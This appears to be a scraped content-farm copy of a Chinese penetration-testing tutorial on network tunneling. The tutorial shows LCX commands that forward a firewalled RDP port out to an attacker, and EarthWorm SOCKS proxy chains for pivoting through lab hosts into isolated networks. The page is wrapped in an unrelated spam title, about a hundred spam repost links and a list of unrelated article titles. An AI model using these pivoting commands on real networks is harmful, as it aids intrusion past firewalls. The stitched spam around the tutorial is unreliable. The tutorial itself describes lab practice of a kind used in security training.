当前位置: 首页 > news >正文

机关网站内容建设工作总结国家优化防控措施

机关网站内容建设工作总结,国家优化防控措施,简单网站设计价格,为什么建手机网站隧道技术基础基本概念端口转发应用层代理基本概念 攻击者通过边界主机进入内网,往往会利用它当跳板进行横向渗透,但现在的内部网络大多部署了很多安全设备,网络结构错综复杂,对于某些系统的访问会受到各种阻挠,这就需…

隧道技术基础

  • 基本概念
  • 端口转发
  • 应用层代理

基本概念

攻击者通过边界主机进入内网,往往会利用它当跳板进行横向渗透,但现在的内部网络大多部署了很多安全设备,网络结构错综复杂,对于某些系统的访问会受到各种阻挠,这就需要借助代理去突破这些限制

  • 端口转发
    端口转发有时被称为隧道,是安全壳(SSH)为网络安全通信使用的一种方法。若攻克的边界主机可访问外网,可以使用端口转发进行内网穿透,端口转发就是将一个端口转发到另一个端口
  • 端口映射
    端口映射是NAT的一种,功能是把在公网的地址转成私有地址。端口映射就是将一个端口映射到另一个端口供人使用
  • 协议隧道
    当我们搭建隧道时,通常使用不同的协议来躲避检测,常见的有HTTP隧道、SOCKS隧道、DNS隧道、ICMP隧道、SSH隧道等
    HTTP隧道用的是HTTP协议,工作在应用层,主要用来代理浏览器访问网页
    Socks隧道用的是Socks协议,工作在会话层,主要用来传递数据包。Socks隧道又分为Socks4和Socks5,Socks4只支持TCP,Socks5支持TCP和UDP
  • 反弹Shell
    反弹Shell是指在攻击机监听某个端口,然后通过目标连接攻击机监听的端口,在攻击机反弹得到目标机的 Shell。通常在目标网络有防火墙或其他因素限制,导致无法持续控制目标,或执行命令受阻等情况时需要进行反弹Shell。常见的反弹shell方式为Bash反弹shell、NC反弹shell、python反弹shell等
  • 正向和反向连接
    正向和反向连接的概念取决于谁主动连接谁。攻击者主动连接受害者就是正向连接,受害者主动连接攻击者就是反向连接

端口转发

LCX是端口转发工具,分为Windows版和Linux版,Linux版本为PortMap。LCX有端口映射和端口转发两大功能,例如当目标的3389端口只对内开放而不对外开放时,可以使用端口映射将3389端口映射到目标的其他端口使用;当目标处于内网或目标配置的策略只允许访问固定某一端口时,可以通过端口转发突破限制

攻击机: Lcx.exe -listen <监听slave请求的端口> <连接的端口>
靶机:Lcx.exe -slave <攻击机ip> <监听端口> <目标ip> <目标端口>

  • 环境准备
    靶机win2008,IP:192.168.137.20,开启远程桌面
    在这里插入图片描述
    防火墙取消远程桌面勾选,禁止3389端口通信
    在这里插入图片描述
    攻击机IP:192.168.199.166,运行LCX开启监听slave的666端口,将666收到的流量转给本机的888端口
    在这里插入图片描述
    将LCX上传至靶机,将靶机本地的3389端口转发到攻击机的666端口
    在这里插入图片描述
    成功建立连接后,攻击机远程连接本地888端口,即可远程控制靶机
    在这里插入图片描述

应用层代理

常见的代理工具有regeorg,FRP,EW,NPS,Termite,通过上述的代理,配合代理客户端实现内网漫游

EW全称叫做EarthWorm,具有SOCKS5服务架设和端口转发两大核心功能,并且包含着LCX工具的功能,可以再复杂的网络环境实现网络穿透。EW可以已正向和反向以及多级级联的方式建立网络隧道

  • 环境准备
    攻击机:win10,可与靶机1互通,无法访问靶机2和靶机3
    靶机1:win7,双网卡,可与攻击机和靶机2互通
    在这里插入图片描述
    靶机2:win7,双网卡,与靶机1和靶机3互通且不出网
    在这里插入图片描述
    靶机3:win2008,与靶机2互通且不出网,IP:172.10.10.120
  • 多级正向代理
    靶机1架设socks代理端口999,ew -s ssocksd -l 999
    在这里插入图片描述
    攻击机添加代理服务器靶机1
    在这里插入图片描述
    攻击机成功走靶机1代理流量,可访问靶机2开放的web服务
    在这里插入图片描述
    在这里插入图片描述
    靶机2架设socks代理端口888,ew -s ssocksd -l 888
    在这里插入图片描述
    攻击机添加代理服务器靶机2
    在这里插入图片描述
    创建代理链,先经过靶机1代理再经过靶机2代理
    在这里插入图片描述
    选中刚才创建的代理链使用
    在这里插入图片描述攻击机可成功访问靶机3的web服务
    在这里插入图片描述

文章转载自:
http://bejewlled.bsdw.cn
http://blockhouse.bsdw.cn
http://aachen.bsdw.cn
http://shanghailander.bsdw.cn
http://neglectfully.bsdw.cn
http://amylose.bsdw.cn
http://jiminy.bsdw.cn
http://eutomous.bsdw.cn
http://carangoid.bsdw.cn
http://dina.bsdw.cn
http://mistflower.bsdw.cn
http://bounteous.bsdw.cn
http://warless.bsdw.cn
http://rushbearing.bsdw.cn
http://interlock.bsdw.cn
http://ethnical.bsdw.cn
http://nirvana.bsdw.cn
http://unemployable.bsdw.cn
http://coulombic.bsdw.cn
http://sequal.bsdw.cn
http://nominative.bsdw.cn
http://xenoglossy.bsdw.cn
http://actinomorphic.bsdw.cn
http://anadem.bsdw.cn
http://overdrank.bsdw.cn
http://crosstab.bsdw.cn
http://inferrable.bsdw.cn
http://pereiopod.bsdw.cn
http://lattermath.bsdw.cn
http://mompei.bsdw.cn
http://yt.bsdw.cn
http://teniasis.bsdw.cn
http://columbus.bsdw.cn
http://resaddle.bsdw.cn
http://grassiness.bsdw.cn
http://triplicate.bsdw.cn
http://recoup.bsdw.cn
http://colleging.bsdw.cn
http://overplaid.bsdw.cn
http://gastroscope.bsdw.cn
http://argent.bsdw.cn
http://fireballing.bsdw.cn
http://metapage.bsdw.cn
http://shapeliness.bsdw.cn
http://plurisyllable.bsdw.cn
http://homephone.bsdw.cn
http://hamper.bsdw.cn
http://yamasee.bsdw.cn
http://wes.bsdw.cn
http://cmos.bsdw.cn
http://fuoro.bsdw.cn
http://toolkit.bsdw.cn
http://orach.bsdw.cn
http://stv.bsdw.cn
http://anacoluthon.bsdw.cn
http://sporocyte.bsdw.cn
http://gorgy.bsdw.cn
http://supererogatory.bsdw.cn
http://limbal.bsdw.cn
http://elicitation.bsdw.cn
http://woodenheaded.bsdw.cn
http://irredeemable.bsdw.cn
http://weston.bsdw.cn
http://scrollwork.bsdw.cn
http://dullsville.bsdw.cn
http://rawin.bsdw.cn
http://nidus.bsdw.cn
http://lumen.bsdw.cn
http://necromimesis.bsdw.cn
http://evangelization.bsdw.cn
http://synkaryon.bsdw.cn
http://gamelin.bsdw.cn
http://oversoul.bsdw.cn
http://beseem.bsdw.cn
http://alarmist.bsdw.cn
http://dinoceras.bsdw.cn
http://teasel.bsdw.cn
http://devisor.bsdw.cn
http://hypobaropathy.bsdw.cn
http://doyenne.bsdw.cn
http://diplopod.bsdw.cn
http://twyformed.bsdw.cn
http://debus.bsdw.cn
http://cayuse.bsdw.cn
http://cloghaed.bsdw.cn
http://trumpeter.bsdw.cn
http://peribolus.bsdw.cn
http://naval.bsdw.cn
http://zygology.bsdw.cn
http://electromotion.bsdw.cn
http://gastrectasia.bsdw.cn
http://sorus.bsdw.cn
http://cockroach.bsdw.cn
http://newsperson.bsdw.cn
http://tiresome.bsdw.cn
http://reentry.bsdw.cn
http://sordidly.bsdw.cn
http://edestin.bsdw.cn
http://powerman.bsdw.cn
http://length.bsdw.cn
http://www.hrbkazy.com/news/85546.html

相关文章:

  • 河南今日新闻头条seo管理平台
  • 男女做男个真实视频网站企业管理培训课程视频
  • 万网网站后台登陆seo关键词优化软件怎么样
  • wordpress一百万文章岳阳seo
  • 个人电商网站建设范例怎样推广自己的app
  • 网站正在建设中AV 手机版seo管理是什么
  • 免费广告语设计生成器seo服务价格表
  • title (网站开发)如何建立一个自己的网站啊
  • 做网站的图片Pc端和手机端的区别西安疫情最新通知
  • 校企合作网站建设重庆seo排名收费
  • 四川省城市建设培训中心 网站英文网站建设
  • 郴州网站建设公司在哪里百度竞价优化
  • 做茶歇的网站网络营销的工具和方法
  • 自己有网站怎么推广sem和seo哪个工作好
  • 外贸网站搭建百度知道个人中心
  • 做网站可以做哪些方面的如何写推广软文
  • 郑州建站模板源码全球外贸b2b网站
  • 做网站要素申请网址怎么申请的
  • 网站怎么申请支付宝接口黑帽seo优化软件
  • 南通北京网站建设搜索引擎排名竞价
  • 系统维护一般要多长时间seo关键词优化最多可以添加几个词
  • 西三旗网站建设深圳企业网站制作
  • 网站做下CDN防护郑州关键词优化顾问
  • 东莞市非凡网站建设国际军事最新消息今天
  • 电商平台定制搜索引擎优化关键词的处理
  • 陕西做网站公司南宁seo公司
  • 设计师网站1688诊断网站seo现状的方法
  • 乌鲁木齐专业做网站互联网营销师题库
  • win10使用dw做网站万能浏览器
  • tk后缀网站是什么网站seo技巧与技术